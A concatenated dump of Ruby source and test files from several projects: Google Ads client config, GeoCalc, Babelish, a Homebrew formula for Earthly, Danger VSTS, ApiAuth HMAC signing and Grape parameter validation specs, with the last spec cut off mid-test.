@get_customer = ::Gapic::Config::Method.new get_customer_config
mutate_customer_config = parent_rpcs.mutate_customer if parent_rpcs.respond_to? :mutate_customer
@mutate_customer = ::Gapic::Config::Method.new mutate_customer_config
list_accessible_customers_config = parent_rpcs.list_accessible_customers if parent_rpcs.respond_to? :list_accessible_customers
@list_accessible_customers = ::Gapic::Config::Method.new list_accessible_customers_config
create_customer_client_config = parent_rpcs.create_customer_client if parent_rpcs.respond_to? :create_customer_client
@create_customer_client = ::Gapic::Config::Method.new create_customer_client_config
yield self if block_given?
end
end
end
end
end
end
end
end
end
end
| 52.396923 | 146 | 0.541694 |
e89679f057a2b19056eafc020dfa433f17748167 | 1,329 | # frozen_string_literal: true
require 'spec_helper'
describe 'GeoCalc' do
describe 'Spherical distance between' do
let(:point_one) { Location.new(0.0, 0.0) }
let(:point_two) { Location.new(0.0, 1.0) }
it 'should be equal to 110951' do
expect(GeoCalc.distance_between(point_one, point_two).value.round).to eq(110_951)
end
end
describe 'Spherical distance between two close points' do
let(:point_one) { Location.new(52.531151, 13.375673) }
let(:point_two) { Location.new(52.531941, 13.377818) }
it 'should be equal to 169' do
expect(GeoCalc.distance_between(point_one, point_two).value.round).to eq(169)
end
end
describe 'Spherical distance between LA city hall and NY City Hall' do
let(:la_city_hall) { Location.new(34.0459068, -118.2715222) }
let(:ny_city_hall) { Location.new(40.7127784, -74.0082477) }
context 'when performing long distance calculations' do
it 'error should be less than 600 meters' do
distance = GeoCalc.distance_between(la_city_hall, ny_city_hall).value.round
# distance calculation from google as a reference for comparison
google_distance = 4_489_000.0
# allow less than 600 meters of error for long distances
expect((distance - google_distance).abs / 1000).to be < 600
end
end
end
end
| 33.225 | 87 | 0.696764 |
bf916580c031697f3da85c922afd56763b70be22 | 117 | #if Rails.env.staging? || Rails.env.production?
# SMTP_SETTINGS = {
# api_key: ENV['POSTMARK_API_KEY']
# }
#end
| 19.5 | 47 | 0.65812 |
21072f829ef84b40591df386196ac1c5fa8a5331 | 306 | # encoding utf-8
# Copyright (c) Universidade Federal Fluminense (UFF).
# This file is part of SAPOS. Please, consult the license terms in the LICENSE file.
class AddExtendOnHoldToPhases < ActiveRecord::Migration
def change
add_column :phases, :extend_on_hold, :boolean, :default => false
end
end
| 30.6 | 84 | 0.75817 |
f84851de9e5102193a4dc6d5723aa4fb878cfdf5 | 1,294 | require 'test_helper'
class TestBase2Csv < Test::Unit::TestCase
def test_load_strings
expected_output = {}
output = Babelish::Base2Csv.new.send :load_strings, nil
assert_equal expected_output, output
end
def test_create_csv_file
keys = ["ERROR_HANDLER_WARNING_DISMISS", "ANOTHER_STRING"]
filename = "test_data"
strings = {filename => {"ERROR_HANDLER_WARNING_DISMISS" => "OK", "ANOTHER_STRING" => "hello"}}
converter = Babelish::Base2Csv.new(:headers => %w{variables english}, :filenames => [filename])
converter.send :create_csv_file, keys, strings
assert File.exist?(converter.csv_filename)
# clean up
system("rm -rf ./" + converter.csv_filename)
end
def test_initialize
csv_filename = "file.csv"
filenames = %w{"french.strings english.strings"}
headers = %w{"constants french english"}
converter = Babelish::Base2Csv.new({
:csv_filename => csv_filename,
:headers => headers,
:filenames => filenames
})
assert_equal csv_filename, converter.csv_filename
assert_equal headers, converter.headers
assert_equal filenames, converter.filenames
end
def test_initialize_with_default_values
converter = Babelish::Base2Csv.new
assert_not_nil converter.csv_filename
end
end
| 29.409091 | 99 | 0.710974 |
f85822d4ac322746e2f1ca86f2eb191b87b3e536 | 2,012 | class Earthly < Formula
desc "Build automation tool for the container era"
homepage "https://earthly.dev/"
url "https://github.com/earthly/earthly/archive/v0.5.8.tar.gz"
sha256 "6ef27bea990737c9ed76dfd05699c0b992ee0ca72c939b53c036748afee97385"
license "BUSL-1.1"
head "https://github.com/earthly/earthly.git"
livecheck do
url :stable
strategy :github_latest
end
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "96c08a5ec465e6c2e72aa08a748e31582f03e6ce579e801f807f035bad826c7e"
sha256 cellar: :any_skip_relocation, big_sur: "b3ce125190285a7e77042c0d7bb20b58278713b20cae6443675559cbfdc5caf3"
sha256 cellar: :any_skip_relocation, catalina: "50c318813ebaa8eb0d1903469b51acbfb892538c5cdbad6acf438ff2bb18d0b8"
sha256 cellar: :any_skip_relocation, mojave: "cd5ad392759f2fca3f2d4066a69d28cd574a60a1f6b4664c86c8ac6d95ca46c6"
sha256 cellar: :any_skip_relocation, x86_64_linux: "3cf4fb7382e556932176089d413652e479f564e15f0fcbb01199c02b2aa19548"
end
depends_on "go" => :build
def install
ldflags = "-X main.DefaultBuildkitdImage=earthly/buildkitd:v#{version} -X main.Version=v#{version} -X" \
" main.GitSha=53c5fa7a37989eea72e2a88c2f4d9c04257c6faf "
tags = "dfrunmount dfrunsecurity dfsecrets dfssh dfrunnetwork"
system "go", "build",
"-tags", tags,
"-ldflags", ldflags,
*std_go_args,
"./cmd/earthly/main.go"
bash_output = Utils.safe_popen_read("#{bin}/earthly", "bootstrap", "--source", "bash")
(bash_completion/"earthly").write bash_output
zsh_output = Utils.safe_popen_read("#{bin}/earthly", "bootstrap", "--source", "zsh")
(zsh_completion/"_earthly").write zsh_output
end
test do
(testpath/"build.earthly").write <<~EOS
default:
\tRUN echo Homebrew
EOS
output = shell_output("#{bin}/earthly --buildkit-host 127.0.0.1 +default 2>&1", 1).strip
assert_match "Error while dialing invalid address 127.0.0.1", output
end
end
| 39.45098 | 122 | 0.73161 |
180040f4bd3d8b597c931372c646a532d6039e3d | 2,128 | # coding: utf-8
require "danger/request_sources/vsts"
RSpec.describe Danger::RequestSources::VSTS, host: :vsts do
let(:env) { stub_env }
let(:subject) { Danger::RequestSources::VSTS.new(stub_ci, env) }
describe "#new" do
it "should not raise uninitialized constant error" do
expect { described_class.new(stub_ci, env) }.not_to raise_error
end
end
describe "#host" do
it "sets the host specified by `DANGER_VSTS_HOST`" do
expect(subject.host).to eq("https://example.visualstudio.com/example")
end
end
describe "#validates_as_api_source" do
it "validates_as_api_source for non empty `DANGER_VSTS_API_TOKEN`" do
expect(subject.validates_as_api_source?).to be true
end
end
describe "#pr_json" do
before do
stub_pull_request
subject.fetch_details
end
it "has a non empty pr_json after `fetch_details`" do
expect(subject.pr_json).to be_truthy
end
describe "#pr_json[:pullRequestId]" do
it "has fetched the same pull request id as ci_sources's `pull_request_id`" do
expect(subject.pr_json[:pullRequestId]).to eq(1)
end
end
describe "#pr_json[:title]" do
it "has fetched the pull requests title" do
expect(subject.pr_json[:title]).to eq("This is a danger test")
end
end
end
describe "#no_danger_comments" do
before do
stub_get_comments_request_no_danger
end
it "has to post a new comment" do
allow(subject).to receive(:post_new_comment)
expect(subject).to receive(:post_new_comment)
subject.update_pull_request!(warnings: [], errors: [], messages: [], markdowns: [], danger_id: "danger", new_comment: false)
end
end
describe "#danger_comment_update" do
before do
stub_get_comments_request_with_danger
end
it "it has to update the previous comment" do
allow(subject).to receive(:update_old_comment)
expect(subject).to receive(:update_old_comment)
subject.update_pull_request!(warnings: [], errors: [], messages: [], markdowns: [], danger_id: "danger", new_comment: false)
end
end
end
| 28.756757 | 130 | 0.68938 |
2111320c7b14c244119b95eed6657f0cde96f0b5 | 6,549 | # encoding: UTF-8
require File.expand_path(File.dirname(__FILE__) + '/spec_helper')
describe 'ApiAuth' do
describe 'generating secret keys' do
it 'should generate secret keys' do
ApiAuth.generate_secret_key
end
it 'should generate secret keys that are 88 characters' do
expect(ApiAuth.generate_secret_key.size).to be(88)
end
it 'should generate keys that have a Hamming Distance of more than 65' do
key1 = ApiAuth.generate_secret_key
key2 = ApiAuth.generate_secret_key
expect(Amatch::Hamming.new(key1).match(key2)).to be > 65
end
end
def hmac(secret_key, request, canonical_string = nil, digest = 'sha1')
canonical_string ||= ApiAuth::Headers.new(request).canonical_string
digest = OpenSSL::Digest.new(digest)
ApiAuth.b64_encode(OpenSSL::HMAC.digest(digest, secret_key, canonical_string))
end
describe '.sign!' do
let(:request) { RestClient::Request.new(:url => 'http://google.com', :method => :get) }
let(:headers) { ApiAuth::Headers.new(request) }
it 'generates date header before signing' do
expect(ApiAuth::Headers).to receive(:new).and_return(headers)
expect(headers).to receive(:set_date).ordered
expect(headers).to receive(:sign_header).ordered
ApiAuth.sign!(request, 'abc', '123')
end
it 'generates content-md5 header before signing' do
expect(ApiAuth::Headers).to receive(:new).and_return(headers)
expect(headers).to receive(:calculate_md5).ordered
expect(headers).to receive(:sign_header).ordered
ApiAuth.sign!(request, 'abc', '123')
end
it 'returns the same request object back' do
expect(ApiAuth.sign!(request, 'abc', '123')).to be request
end
it 'calculates the hmac_signature as expected' do
ApiAuth.sign!(request, '1044', '123')
signature = hmac('123', request)
expect(request.headers['Authorization']).to eq("APIAuth 1044:#{signature}")
end
context 'when passed the hmac digest option' do
let(:request) do
Net::HTTP::Put.new('/resource.xml?foo=bar&bar=foo',
'content-type' => 'text/plain',
'content-md5' => '1B2M2Y8AsgTpgAmY7PhCfg==',
'date' => Time.now.utc.httpdate)
end
let(:canonical_string) { ApiAuth::Headers.new(request).canonical_string }
it 'calculates the hmac_signature with http method' do
ApiAuth.sign!(request, '1044', '123', :digest => 'sha256')
signature = hmac('123', request, canonical_string, 'sha256')
expect(request['Authorization']).to eq("APIAuth-HMAC-SHA256 1044:#{signature}")
end
end
end
describe '.authentic?' do
let(:request) do
new_request = Net::HTTP::Put.new('/resource.xml?foo=bar&bar=foo',
'content-type' => 'text/plain',
'content-md5' => '1B2M2Y8AsgTpgAmY7PhCfg==',
'date' => Time.now.utc.httpdate)
signature = hmac('123', new_request)
new_request['Authorization'] = "APIAuth 1044:#{signature}"
new_request
end
it 'validates that the signature in the request header matches the way we sign it' do
expect(ApiAuth.authentic?(request, '123')).to eq true
end
it 'fails to validate a non matching signature' do
expect(ApiAuth.authentic?(request, '456')).to eq false
end
it 'fails to validate non matching md5' do
request['content-md5'] = '12345'
expect(ApiAuth.authentic?(request, '123')).to eq false
end
it 'fails to validate expired requests' do
request['date'] = 16.minutes.ago.utc.httpdate
expect(ApiAuth.authentic?(request, '123')).to eq false
end
it 'fails to validate if the date is invalid' do
request['date'] = '٢٠١٤-٠٩-٠٨ ١٦:٣١:١٤ +٠٣٠٠'
expect(ApiAuth.authentic?(request, '123')).to eq false
end
it 'fails to validate if the request method differs' do
canonical_string = ApiAuth::Headers.new(request).canonical_string(override_http_method: 'POST', with_http_method: true)
signature = hmac('123', request, canonical_string)
request['Authorization'] = "APIAuth 1044:#{signature}"
expect(ApiAuth.authentic?(request, '123')).to eq false
end
context 'when passed the hmac digest option' do
let(:request) do
new_request = Net::HTTP::Put.new('/resource.xml?foo=bar&bar=foo',
'content-type' => 'text/plain',
'content-md5' => '1B2M2Y8AsgTpgAmY7PhCfg==',
'date' => Time.now.utc.httpdate)
canonical_string = ApiAuth::Headers.new(new_request).canonical_string
signature = hmac('123', new_request, canonical_string, 'sha256')
new_request['Authorization'] = "APIAuth-HMAC-#{digest} 1044:#{signature}"
new_request
end
context 'valid request digest' do
let(:digest) { 'SHA256' }
context 'matching client digest' do
it 'validates matching digest' do
expect(ApiAuth.authentic?(request, '123', :digest => 'sha256')).to eq true
end
end
context 'different client digest' do
it 'raises an exception' do
expect { ApiAuth.authentic?(request, '123', :digest => 'sha512') }.to raise_error(ApiAuth::InvalidRequestDigest)
end
end
end
context 'invalid request digest' do
let(:digest) { 'SHA111' }
it 'fails validation' do
expect(ApiAuth.authentic?(request, '123', :digest => 'sha111')).to eq false
end
end
end
end
describe '.access_id' do
context 'normal APIAuth Auth header' do
let(:request) do
RestClient::Request.new(
:url => 'http://google.com',
:method => :get,
:headers => { :authorization => 'APIAuth 1044:aGVsbG8gd29ybGQ=' }
)
end
it 'parses it from the Auth Header' do
expect(ApiAuth.access_id(request)).to eq('1044')
end
end
context 'Corporate prefixed APIAuth header' do
let(:request) do
RestClient::Request.new(
:url => 'http://google.com',
:method => :get,
:headers => { :authorization => 'Corporate APIAuth 1044:aGVsbG8gd29ybGQ=' }
)
end
it 'parses it from the Auth Header' do
expect(ApiAuth.access_id(request)).to eq('1044')
end
end
end
end
| 35.209677 | 125 | 0.614598 |
ac1f1df338609e6491750768710b3e57dc0deca7 | 66,985 | # frozen_string_literal: true
require 'spec_helper'
describe Grape::Validations do
subject { Class.new(Grape::API) }
def app
subject
end
def declared_params
subject.namespace_stackable(:declared_params).flatten
end
describe 'params' do
context 'optional' do
before do
subject.params do
optional :a_number, regexp: /^[0-9]+$/
optional :attachment, type: File
end
subject.get '/optional' do
'optional works!'
end
end
it 'validates when params is present' do
get '/optional', a_number: 'string'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('a_number is invalid')
get '/optional', a_number: 45
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional works!')
end
it "doesn't validate when param not present" do
get '/optional', a_number: nil, attachment: nil
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional works!')
end
it 'adds to declared parameters' do
subject.params do
optional :some_param
end
expect(declared_params).to eq([:some_param])
end
end
context 'optional using Grape::Entity documentation' do
def define_optional_using
documentation = { field_a: { type: String }, field_b: { type: String } }
subject.params do
optional :all, using: documentation
end
end
before do
define_optional_using
subject.get '/optional' do
'optional with using works'
end
end
it 'adds entity documentation to declared params' do
define_optional_using
expect(declared_params).to eq(%i[field_a field_b])
end
it 'works when field_a and field_b are not present' do
get '/optional'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional with using works')
end
it 'works when field_a is present' do
get '/optional', field_a: 'woof'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional with using works')
end
it 'works when field_b is present' do
get '/optional', field_b: 'woof'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional with using works')
end
end
context 'required' do
before do
subject.params do
requires :key, type: String
end
subject.get('/required') { 'required works' }
subject.put('/required') { { key: params[:key] }.to_json }
end
it 'errors when param not present' do
get '/required'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('key is missing')
end
it "doesn't throw a missing param when param is present" do
get '/required', key: 'cool'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('required works')
end
it 'adds to declared parameters' do
subject.params do
requires :some_param
end
expect(declared_params).to eq([:some_param])
end
it 'works when required field is present but nil' do
put '/required', { key: nil }.to_json, 'CONTENT_TYPE' => 'application/json'
expect(last_response.status).to eq(200)
expect(JSON.parse(last_response.body)).to eq('key' => nil)
end
end
context 'requires with nested params' do
before do
subject.params do
requires :first_level, type: Hash do
optional :second_level, type: Array do
requires :value, type: Integer
optional :name, type: String
optional :third_level, type: Array do
requires :value, type: Integer
optional :name, type: String
optional :fourth_level, type: Array do
requires :value, type: Integer
optional :name, type: String
end
end
end
end
end
subject.put('/required') { 'required works' }
end
let(:request_params) do
{
first_level: {
second_level: [
{ value: 1, name: 'Lisa' },
{
value: 2,
name: 'James',
third_level: [
{ value: 'three', name: 'Sophie' },
{
value: 4,
name: 'Jenny',
fourth_level: [
{ name: 'Samuel' }, { value: 6, name: 'Jane' }
]
}
]
}
]
}
}
end
it 'validates correctly in deeply nested params' do
put '/required', request_params.to_json, 'CONTENT_TYPE' => 'application/json'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq(
'first_level[second_level][1][third_level][0][value] is invalid, ' \
'first_level[second_level][1][third_level][1][fourth_level][0][value] is missing'
)
end
end
context 'requires :all using Grape::Entity documentation' do
def define_requires_all
documentation = {
required_field: { type: String },
optional_field: { type: String }
}
subject.params do
requires :all, except: :optional_field, using: documentation
end
end
before do
define_requires_all
subject.get '/required' do
'required works'
end
end
it 'adds entity documentation to declared params' do
define_requires_all
expect(declared_params).to eq(%i[required_field optional_field])
end
it 'errors when required_field is not present' do
get '/required'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('required_field is missing')
end
it 'works when required_field is present' do
get '/required', required_field: 'woof'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('required works')
end
end
context 'requires :none using Grape::Entity documentation' do
def define_requires_none
documentation = {
required_field: { type: String },
optional_field: { type: String }
}
subject.params do
requires :none, except: :required_field, using: documentation
end
end
before do
define_requires_none
subject.get '/required' do
'required works'
end
end
it 'adds entity documentation to declared params' do
define_requires_none
expect(declared_params).to eq(%i[required_field optional_field])
end
it 'errors when required_field is not present' do
get '/required'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('required_field is missing')
end
it 'works when required_field is present' do
get '/required', required_field: 'woof'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('required works')
end
end
context 'requires :all or :none but except a non-existent field using Grape::Entity documentation' do
context 'requires :all' do
def define_requires_all
documentation = {
required_field: { type: String },
optional_field: { type: String }
}
subject.params do
requires :all, except: :non_existent_field, using: documentation
end
end
it 'adds only the entity documentation to declared params, nothing more' do
define_requires_all
expect(declared_params).to eq(%i[required_field optional_field])
end
end
context 'requires :none' do
def define_requires_none
documentation = {
required_field: { type: String },
optional_field: { type: String }
}
subject.params do
requires :none, except: :non_existent_field, using: documentation
end
end
it 'adds only the entity documentation to declared params, nothing more' do
expect { define_requires_none }.to raise_error(ArgumentError)
end
end
end
context 'required with an Array block' do
before do
subject.params do
requires :items, type: Array do
requires :key
end
end
subject.get('/required') { 'required works' }
subject.put('/required') { { items: params[:items] }.to_json }
end
it 'errors when param not present' do
get '/required'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is missing')
end
it 'errors when param is not an Array' do
get '/required', items: 'hello'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is invalid')
get '/required', items: { key: 'foo' }
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is invalid')
end
it "doesn't throw a missing param when param is present" do
get '/required', items: [{ key: 'hello' }, { key: 'world' }]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('required works')
end
it "doesn't throw a missing param when param is present but empty" do
put '/required', { items: [] }.to_json, 'CONTENT_TYPE' => 'application/json'
expect(last_response.status).to eq(200)
expect(JSON.parse(last_response.body)).to eq('items' => [])
end
it 'adds to declared parameters' do
subject.params do
requires :items, type: Array do
requires :key
end
end
expect(declared_params).to eq([items: [:key]])
end
end
# Ensure there is no leakage between declared Array types and
# subsequent Hash types
context 'required with an Array and a Hash block' do
before do
subject.params do
requires :cats, type: Array[String], default: []
requires :items, type: Hash do
requires :key
end
end
subject.get '/required' do
'required works'
end
end
it 'does not output index [0] for Hash types' do
get '/required', cats: ['Garfield'], items: { foo: 'bar' }
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items[key] is missing')
end
end
context 'required with a Hash block' do
before do
subject.params do
requires :items, type: Hash do
requires :key
end
end
subject.get '/required' do
'required works'
end
end
it 'errors when param not present' do
get '/required'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is missing, items[key] is missing')
end
it 'errors when nested param not present' do
get '/required', items: { foo: 'bar' }
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items[key] is missing')
end
it 'errors when param is not a Hash' do
get '/required', items: 'hello'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is invalid, items[key] is missing')
get '/required', items: [{ key: 'foo' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is invalid')
end
it "doesn't throw a missing param when param is present" do
get '/required', items: { key: 'hello' }
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('required works')
end
it 'adds to declared parameters' do
subject.params do
requires :items, type: Array do
requires :key
end
end
expect(declared_params).to eq([items: [:key]])
end
end
context 'hash with a required param with validation' do
before do
subject.params do
requires :items, type: Hash do
requires :key, type: String, values: %w[a b]
end
end
subject.get '/required' do
'required works'
end
end
it 'errors when param is not a Hash' do
get '/required', items: 'not a hash'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is invalid, items[key] is missing, items[key] is invalid')
get '/required', items: [{ key: 'hash in array' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is invalid, items[key] does not have a valid value')
end
it 'works when all params match' do
get '/required', items: { key: 'a' }
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('required works')
end
end
context 'group' do
before do
subject.params do
group :items, type: Array do
requires :key
end
end
subject.get '/required' do
'required works'
end
end
it 'errors when param not present' do
get '/required'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is missing')
end
it "doesn't throw a missing param when param is present" do
get '/required', items: [key: 'hello']
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('required works')
end
it 'adds to declared parameters' do
subject.params do
group :items, type: Array do
requires :key
end
end
expect(declared_params).to eq([items: [:key]])
end
end
context 'group params with nested params which has a type' do
let(:invalid_items) { { items: '' } }
before do
subject.params do
optional :items, type: Array do
optional :key1, type: String
optional :key2, type: String
end
end
subject.post '/group_with_nested' do
'group with nested works'
end
end
it 'errors when group param is invalid' do
post '/group_with_nested', items: invalid_items
expect(last_response.status).to eq(400)
end
end
context 'custom validator for a Hash' do
let(:date_range_validator) do
Class.new(Grape::Validations::Validators::Base) do
def validate_param!(attr_name, params)
return if params[attr_name][:from] <= params[attr_name][:to]
raise Grape::Exceptions::Validation.new(params: [@scope.full_name(attr_name)], message: "'from' must be lower or equal to 'to'")
end
end
end
before do
described_class.register_validator('date_range', date_range_validator)
end
after do
described_class.deregister_validator('date_range')
end
before do
subject.params do
optional :date_range, date_range: true, type: Hash do
requires :from, type: Integer
requires :to, type: Integer
end
end
subject.get('/optional') do
'optional works'
end
subject.params do
requires :date_range, date_range: true, type: Hash do
requires :from, type: Integer
requires :to, type: Integer
end
end
subject.get('/required') do
'required works'
end
end
context 'which is optional' do
it "doesn't throw an error if the validation passes" do
get '/optional', date_range: { from: 1, to: 2 }
expect(last_response.status).to eq(200)
end
it 'errors if the validation fails' do
get '/optional', date_range: { from: 2, to: 1 }
expect(last_response.status).to eq(400)
end
end
context 'which is required' do
it "doesn't throw an error if the validation passes" do
get '/required', date_range: { from: 1, to: 2 }
expect(last_response.status).to eq(200)
end
it 'errors if the validation fails' do
get '/required', date_range: { from: 2, to: 1 }
expect(last_response.status).to eq(400)
end
end
end
context 'validation within arrays' do
before do
subject.params do
group :children, type: Array do
requires :name
group :parents, type: Array do
requires :name, allow_blank: false
end
end
end
subject.get '/within_array' do
'within array works'
end
end
it 'can handle new scopes within child elements' do
get '/within_array', children: [
{ name: 'John', parents: [{ name: 'Jane' }, { name: 'Bob' }] },
{ name: 'Joe', parents: [{ name: 'Josie' }] }
]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('within array works')
end
it 'errors when a parameter is not present' do
get '/within_array', children: [
{ name: 'Jim', parents: [{ name: 'Joy' }] },
{ name: 'Job', parents: [{}] }
]
# NOTE: with body parameters in JSON or XML or similar this
# should actually fail with: children[parents][name] is missing.
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('children[1][parents] is missing, children[0][parents][1][name] is missing, children[0][parents][1][name] is empty')
end
it 'errors when a parameter is not present in array within array' do
get '/within_array', children: [
{ name: 'Jim', parents: [{ name: 'Joy' }] },
{ name: 'Job', parents: [{ name: 'Bill' }, { name: '' }] }
]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('children[1][parents][1][name] is empty')
end
it 'handles errors for all array elements' do
get '/within_array', children: [
{ name: 'Jim', parents: [] },
{ name: 'Job', parents: [] }
]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq(
'children[0][parents][0][name] is missing, ' \
'children[1][parents][0][name] is missing'
)
end
it 'safely handles empty arrays and blank parameters' do
# NOTE: with body parameters in JSON or XML or similar this
# should actually return 200, since an empty array is valid.
get '/within_array', children: []
expect(last_response.status).to eq(400)
expect(last_response.body).to eq(
'children[0][name] is missing, ' \
'children[0][parents] is missing, ' \
'children[0][parents] is invalid, ' \
'children[0][parents][0][name] is missing, ' \
'children[0][parents][0][name] is empty'
)
get '/within_array', children: [name: 'Jay']
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('children[0][parents] is missing, children[0][parents][0][name] is missing, children[0][parents][0][name] is empty')
end
it 'errors when param is not an Array' do
get '/within_array', children: 'hello'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('children is invalid')
get '/within_array', children: { name: 'foo' }
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('children is invalid')
get '/within_array', children: [name: 'Jay', parents: { name: 'Fred' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('children[0][parents] is invalid')
end
end
context 'with block param' do
before do
subject.params do
requires :planets, type: Array do
requires :name
end
end
subject.get '/req' do
'within array works'
end
subject.put '/req' do
''
end
subject.params do
group :stars, type: Array do
requires :name
end
end
subject.get '/grp' do
'within array works'
end
subject.put '/grp' do
''
end
subject.params do
requires :name
optional :moons, type: Array do
requires :name
end
end
subject.get '/opt' do
'within array works'
end
subject.put '/opt' do
''
end
end
it 'requires defaults to Array type' do
get '/req', planets: 'Jupiter, Saturn'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('planets is invalid')
get '/req', planets: { name: 'Jupiter' }
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('planets is invalid')
get '/req', planets: [{ name: 'Venus' }, { name: 'Mars' }]
expect(last_response.status).to eq(200)
put_with_json '/req', planets: []
expect(last_response.status).to eq(200)
end
it 'optional defaults to Array type' do
get '/opt', name: 'Jupiter', moons: 'Europa, Ganymede'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('moons is invalid')
get '/opt', name: 'Jupiter', moons: { name: 'Ganymede' }
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('moons is invalid')
get '/opt', name: 'Jupiter', moons: [{ name: 'Io' }, { name: 'Callisto' }]
expect(last_response.status).to eq(200)
put_with_json '/opt', name: 'Venus'
expect(last_response.status).to eq(200)
put_with_json '/opt', name: 'Mercury', moons: []
expect(last_response.status).to eq(200)
end
it 'group defaults to Array type' do
get '/grp', stars: 'Sun'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('stars is invalid')
get '/grp', stars: { name: 'Sun' }
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('stars is invalid')
get '/grp', stars: [{ name: 'Sun' }]
expect(last_response.status).to eq(200)
put_with_json '/grp', stars: []
expect(last_response.status).to eq(200)
end
end
context 'validation within arrays with JSON' do
before do
subject.params do
group :children, type: Array do
requires :name
group :parents, type: Array do
requires :name
end
end
end
subject.put '/within_array' do
'within array works'
end
end
it 'can handle new scopes within child elements' do
put_with_json '/within_array', children: [
{ name: 'John', parents: [{ name: 'Jane' }, { name: 'Bob' }] },
{ name: 'Joe', parents: [{ name: 'Josie' }] }
]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('within array works')
end
it 'errors when a parameter is not present' do
put_with_json '/within_array', children: [
{ name: 'Jim', parents: [{}] },
{ name: 'Job', parents: [{ name: 'Joy' }] }
]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('children[0][parents][0][name] is missing')
end
it 'safely handles empty arrays and blank parameters' do
put_with_json '/within_array', children: []
expect(last_response.status).to eq(200)
put_with_json '/within_array', children: [name: 'Jay']
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('children[0][parents] is missing, children[0][parents][0][name] is missing')
end
end
context 'optional with an Array block' do
before do
subject.params do
optional :items, type: Array do
requires :key
end
end
subject.get '/optional_group' do
'optional group works'
end
end
it "doesn't throw a missing param when the group isn't present" do
get '/optional_group'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional group works')
end
it "doesn't throw a missing param when both group and param are given" do
get '/optional_group', items: [{ key: 'foo' }]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('optional group works')
end
it 'errors when group is present, but required param is not' do
get '/optional_group', items: [{ not_key: 'foo' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items[0][key] is missing')
end
it "errors when param is present but isn't an Array" do
get '/optional_group', items: 'hello'
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is invalid')
get '/optional_group', items: { key: 'foo' }
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items is invalid')
end
it 'adds to declared parameters' do
subject.params do
optional :items, type: Array do
requires :key
end
end
expect(declared_params).to eq([items: [:key]])
end
end
context 'nested optional Array blocks' do
before do
subject.params do
optional :items, type: Array do
requires :key
optional(:optional_subitems, type: Array) { requires :value }
requires(:required_subitems, type: Array) { requires :value }
end
end
subject.get('/nested_optional_group') { 'nested optional group works' }
end
it 'does no internal validations if the outer group is blank' do
get '/nested_optional_group'
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('nested optional group works')
end
it 'does internal validations if the outer group is present' do
get '/nested_optional_group', items: [{ key: 'foo' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items[0][required_subitems] is missing, items[0][required_subitems][0][value] is missing')
get '/nested_optional_group', items: [{ key: 'foo', required_subitems: [{ value: 'bar' }] }]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('nested optional group works')
end
it 'handles deep nesting' do
get '/nested_optional_group', items: [{ key: 'foo', required_subitems: [{ value: 'bar' }], optional_subitems: [{ not_value: 'baz' }] }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items[0][optional_subitems][0][value] is missing')
get '/nested_optional_group', items: [{ key: 'foo', required_subitems: [{ value: 'bar' }], optional_subitems: [{ value: 'baz' }] }]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('nested optional group works')
end
it 'handles validation within arrays' do
get '/nested_optional_group', items: [{ key: 'foo' }]
expect(last_response.status).to eq(400)
expect(last_response.body).to eq('items[0][required_subitems] is missing, items[0][required_subitems][0][value] is missing')
get '/nested_optional_group', items: [{ key: 'foo', required_subitems: [{ value: 'bar' }] }]
expect(last_response.status).to eq(200)
expect(last_response.body).to eq('nested optional group works')
get '/nested_optional_group', items: [{ key: 'foo', required_subitems: [{ value: 'bar' }], optional_subitems: [{ not_value: 'baz' }] }]
expect(last_response.status).to eq(400)
